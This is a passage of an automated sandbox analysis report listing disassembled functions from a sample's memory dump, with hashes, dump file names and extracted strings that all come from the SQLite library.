                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 170235E2A0C28189FB778A39D948B7D6BA9EF45394F554232EA8F47691CF3CD941C700
                                                                                                                                                                                                                              Function 00007FFB0C7C9AC0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: 234d24ab78c041c97127b44f915937d46382276f4bd99e440f8e29486e42e105
                                                                                                                                                                                                                              • Instruction ID: 2bbf78028c4903f1103e35fcf7d8bb27ee960c7d96fd0cfb6ec57d101ba977f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 234d24ab78c041c97127b44f915937d46382276f4bd99e440f8e29486e42e105
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 253161B6618B8186DB60CF35E8886AE73A4FF88754F544135EA9D43B59DF3CD145CB00
                                                                                                                                                                                                                              Function 00007FFB0C6AA8A0 Relevance: 8.6, Strings: 6, Instructions: 1130COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ?$?$BINARY$Expression tree is too large (maximum depth %d)$auto-index$automatic index on %s(%s)
                                                                                                                                                                                                                              • API String ID: 0-2778317500
                                                                                                                                                                                                                              • Opcode ID: 69ee29c1a85859ca265612b6d53f71265f5f21c0cc02f3bbb590bb56c0c2f6e5
                                                                                                                                                                                                                              • Instruction ID: 82ec600d00613fd984b19895c829858b3c66a895b9c73e5e79c223d465ef3822
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69ee29c1a85859ca265612b6d53f71265f5f21c0cc02f3bbb590bb56c0c2f6e5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2C28FF2608B818AEB61DF25E448BAD7BA5FB84B84F418136EB8E43755DF38D455CB00
                                                                                                                                                                                                                              Function 00007FFB0C747C20 Relevance: 8.5, Strings: 6, Instructions: 973COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$misuse
                                                                                                                                                                                                                              • API String ID: 0-968123305
                                                                                                                                                                                                                              • Opcode ID: 5e866bf8eac03aac69fd030e9430e884704da55f6b6b6d57d379a419dbebb80b
                                                                                                                                                                                                                              • Instruction ID: 178d258e9241dff030b7127eca0e4f009346d0cc82d6df468cf70ffd6fcd8f95
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e866bf8eac03aac69fd030e9430e884704da55f6b6b6d57d379a419dbebb80b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5A286E2A09A4686EB648F39D458BB933A5FF44B88F150136DE4E97794DF3CE842C341
                                                                                                                                                                                                                              Function 00007FFB0C713F88 Relevance: 8.2, Strings: 6, Instructions: 739COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 20c:20e$40f$40f-20a-20d$50f$50f-20a-20d$second
                                                                                                                                                                                                                              • API String ID: 0-2094803905
                                                                                                                                                                                                                              • Opcode ID: c06cd6adf5e02c2dc99f601cdcf5f653531464e47691ccbe1765fc778dc92821
                                                                                                                                                                                                                              • Instruction ID: b5ba3efc1e4d07b967e20cc825b0e582e47e513f0a6bda45b7aa278cefa8dfee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c06cd6adf5e02c2dc99f601cdcf5f653531464e47691ccbe1765fc778dc92821
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D529CE2F2868646E7258F3DC414A7867E5AF55748F149332EE0EA76E5EF3CE4418700
                                                                                                                                                                                                                              Function 00007FFB0C6BD830 Relevance: 8.2, Strings: 6, Instructions: 738COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$misuse
                                                                                                                                                                                                                              • API String ID: 0-968123305
                                                                                                                                                                                                                              • Opcode ID: 77826ee8baa902aea28029eed04d4d989c989b6ef8ccdfc9013cd0740c96d28d
                                                                                                                                                                                                                              • Instruction ID: 05a31bf379c7ae8691faad43d67adc304468c81a48ad21eb08e1042d2bc54df3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77826ee8baa902aea28029eed04d4d989c989b6ef8ccdfc9013cd0740c96d28d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C72B2E1A0DA8285EB769F75D858BB923A5FF44B84F144132EA4E5B399DF3DE481C300
                                                                                                                                                                                                                              Function 00007FFB0C6CA7A0 Relevance: 8.1, Strings: 6, Instructions: 631COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %d %d %d %d $fts3cursor$illegal first argument to %s$offsets$p$K
                                                                                                                                                                                                                              • API String ID: 0-512197684
                                                                                                                                                                                                                              • Opcode ID: cc3e61a4da039e3837307ec08c8ff40ed8b815f760ae13c2e6321bf51999c818
                                                                                                                                                                                                                              • Instruction ID: 54649baabb823b4831b0bd2070728aa85db1132f5b4fe88b336e5b26d425ffed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc3e61a4da039e3837307ec08c8ff40ed8b815f760ae13c2e6321bf51999c818
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56526AF2A19B4286EB548B7AE848A7A77A4FF84B94F110136DE4D57BA4DF3CE441C700
                                                                                                                                                                                                                              Function 00007FFB0C67A610 Relevance: 8.1, Strings: 6, Instructions: 606COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s: table does not support scanning$ASC$DESC$SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %s$bm25$parse error in rank function: %s
                                                                                                                                                                                                                              • API String ID: 0-3769240353
                                                                                                                                                                                                                              • Opcode ID: 5f6cf6433d47c4cb4f969a4bbcc9ae168752348969e9d4d81803bc27a03127c0
                                                                                                                                                                                                                              • Instruction ID: 90d9dab2df82791dc4a1da70dd08c60d27672e220e34085e940ebfae62e4d12e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f6cf6433d47c4cb4f969a4bbcc9ae168752348969e9d4d81803bc27a03127c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D85290E2A08B5282E766CB35D958BB923A4FF85B84F248635EE4D47799DF3CE451C300
                                                                                                                                                                                                                              Function 00007FFB0C740CB0 Relevance: 8.0, Strings: 6, Instructions: 482COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: main$schema$sqlite_$sqlite_master$sqlite_temp_master$temp_schema
                                                                                                                                                                                                                              • API String ID: 0-3006123741
                                                                                                                                                                                                                              • Opcode ID: 45451b457856cb692d4c14e0e0eed5058c2b8cd0ec89236d97c202284514b5da
                                                                                                                                                                                                                              • Instruction ID: 3161ce4bbbf6d69472a021265cb123df3738c03424cc23c70def5483b98469b8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45451b457856cb692d4c14e0e0eed5058c2b8cd0ec89236d97c202284514b5da
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 161217E3A0859682EB554B36C064A7C3BA2EF46B85F958136DF9E83291DF3CD885D700
                                                                                                                                                                                                                              Function 00007FFB0C6D8570 Relevance: 7.1, Strings: 5, Instructions: 888COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$block$misuse$K
                                                                                                                                                                                                                              • API String ID: 0-2590410422
                                                                                                                                                                                                                              • Opcode ID: 5cf3e30bf7bae32d5e43c45fb08ba50007f33c5f623083ee65a0c7770ed6a44a
                                                                                                                                                                                                                              • Instruction ID: ce37b4a79d106a86f702139100c39ca59911164882cf06bb1142a2d92a90cfb2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cf3e30bf7bae32d5e43c45fb08ba50007f33c5f623083ee65a0c7770ed6a44a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3924AE1E09B4686EBA58F35E88CA7977A4FF48B80F154436EA4E477A0DF3CE4419740
                                                                                                                                                                                                                              Function 00007FFB0C6C5EE0 Relevance: 7.0, Strings: 5, Instructions: 707COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                              • API String ID: 0-3582982771
                                                                                                                                                                                                                              • Opcode ID: 0213c5050dd1b1dbb9ffa182ace20a381e43c978cc7ec7f476a7697f2b1682cf
                                                                                                                                                                                                                              • Instruction ID: 1cd006d1c5900849fc18176d380490daa927b044ae24b404e901c4ef1eca4c8e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0213c5050dd1b1dbb9ffa182ace20a381e43c978cc7ec7f476a7697f2b1682cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD62BCF2A09A8686EBA5DF35D898B7933A8FF44B84F144535EA4E47396DF3CE4418304
                                                                                                                                                                                                                              Function 00007FFB0C758F80 Relevance: 5.9, Strings: 3, Instructions: 2119COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s.%s$%s.rowid$5
                                                                                                                                                                                                                              • API String ID: 0-2959728198
                                                                                                                                                                                                                              • Opcode ID: 97e9d9d64be8420c10dff8da4a434ea0bfe12462297021f9f79eaaae964a54cb
                                                                                                                                                                                                                              • Instruction ID: 4ca97b3b30571e0b27ebdc4eff08e3ce7eb364a397017eaaf96856e4e27b0763
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97e9d9d64be8420c10dff8da4a434ea0bfe12462297021f9f79eaaae964a54cb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 163381F2A186818AEB60CF25D044BBE7BA1FB84B84F158135DB9E47799DF79D841CB00
                                                                                                                                                                                                                              Function 00007FFB0C7A1540 Relevance: 5.6, Strings: 4, Instructions: 626COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %.4c%s%.16c$-mj%06X9%02X$MJ collide: %s$MJ delete: %s
                                                                                                                                                                                                                              • API String ID: 0-4294478755
                                                                                                                                                                                                                              • Opcode ID: b3fc16a77d60ef0b2d62892fbb68617719b85cf2c8c41d0be31f83e68d19e67d
                                                                                                                                                                                                                              • Instruction ID: d81e6101641db376cb68e78afb75b4a7b08ebfe490e2792ab9f646456a4e42be
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3fc16a77d60ef0b2d62892fbb68617719b85cf2c8c41d0be31f83e68d19e67d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 285247E6A09A86C2FB658F35D458ABC23A4EF84F94F994571CE5E077A4DF3CE8418300
                                                                                                                                                                                                                              Function 00007FFB0C69DCD0 Relevance: 4.8, Strings: 3, Instructions: 1036COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: BBB$f$sqlite\_%
                                                                                                                                                                                                                              • API String ID: 0-4099593418
                                                                                                                                                                                                                              • Opcode ID: 68a401ec1bd33c25321d604c19b858e599c8929007dbbf3befc69ff6b5cffcc6
                                                                                                                                                                                                                              • Instruction ID: f4d22970a3ca024e969fed65033f79f51216e25738f493c6aaabd5bd1884eda2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68a401ec1bd33c25321d604c19b858e599c8929007dbbf3befc69ff6b5cffcc6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95B27DB2608A818ADB61DF15E444BAD7BA5FBC8F84F518236DB8E43768DF39D445CB00
                                                                                                                                                                                                                              Function 00007FFB0C7324B0 Relevance: 4.5, Strings: 3, Instructions: 778COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
